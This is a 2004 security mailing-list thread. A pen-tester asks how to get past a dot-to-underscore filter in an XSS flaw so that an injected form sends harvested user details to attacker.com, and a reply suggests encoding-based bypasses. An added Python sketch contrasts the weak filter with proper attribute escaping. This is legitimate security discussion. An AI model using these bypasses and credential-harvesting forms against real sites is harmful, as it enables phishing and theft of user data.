WebApp Sec mailing list archives

RE: Fullstop Substitution in XSS


From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000

Well,
        In the old days, an ip (127.0.0.1) used to be able to be replaced
        for the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1), perhaps
        check if that still works (although I seem to remember it doesn't).
        
        Other than that (and possible dns infiltration) consider sites that,
        upon invalid domain (http://yahoo?test@hello) redirect to somewhere
        else ... even some search sites ... i.e. perhaps you could execute a
        search which your malicious site (attacker.com) would make note of.

        Or ... you say you tried hex encoding ... i.e. this ?

        if result is:
        <form target="INPUT GOES HERE">

        INPUT GOES HERE could be ...

        -------------------------------------
        http://www%2egoogle%2ecom
        -------------------------------------

        If the % gets translated at the time of sending to the site, hex-encode
        that because the above is *exactly* what should appear in the source of
        the form tag, not the decoded result.
-- Michael


-----Original Message-----
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, 29 May 2004 2:49 PM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS


Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerability. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Cheers,
Calum
--
Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net
http://www.fribble.net
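Added example, not code from either poster: a Python sketch of the dot-to-underscore substitution Calum describes next to a context-aware attribute encoding, run over constructed inputs. It shows that the host forms Michael mentions (an all-digit IP, a percent-encoded hostname) pass the substitution untouched, and that encoding the value for its HTML attribute context stops the attribute from being broken out of at all, which is the fix a defender wants. The function and sample names are assumptions.

```python
import html
import ipaddress


def weak_filter(value: str) -> str:
    """The fix from the original post: rewrite literal fullstops only.
    It leaves quotes and angle brackets alone, so it cannot stop a value
    from closing the attribute, and it ignores hosts written without dots."""
    return value.replace(".", "_")


def safe_attr(value: str) -> str:
    """Context-aware fix: encode for a quoted HTML attribute value, so the
    value can neither end the attribute nor start a new tag."""
    return html.escape(value, quote=True)


def render_form(action: str, encoder) -> str:
    """Emit the form tag the way the vulnerable page does, via one encoder."""
    return '<form action="' + encoder(action) + '">'


def dotless_to_dotted(host: str) -> str:
    """Defender-side normalisation: an all-digit host is an IPv4 integer
    form; canonicalise it before any host policy is applied."""
    return str(ipaddress.IPv4Address(int(host))) if host.isdigit() else host


# Constructed sample inputs (hypothetical, for this demonstration only).
DOTTED = "http://127.0.0.1/collect"
DOTLESS = "http://2130706433/collect"      # 127.0.0.1 as a plain integer
PERCENT = "http://www%2egoogle%2ecom/"      # percent-encoded hostname from the reply
BREAKOUT = '"><form action="http://example.invalid/">'  # closes the attribute


def tag_count(markup: str) -> int:
    """How many <form tags the rendered output contains (1 means no injection)."""
    return markup.count("<form")


if __name__ == "__main__":
    for sample in (DOTTED, DOTLESS, PERCENT, BREAKOUT):
        print("weak :", render_form(sample, weak_filter))
        print("safe :", render_form(sample, safe_attr))
    print(dotless_to_dotted("2130706433"))
```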



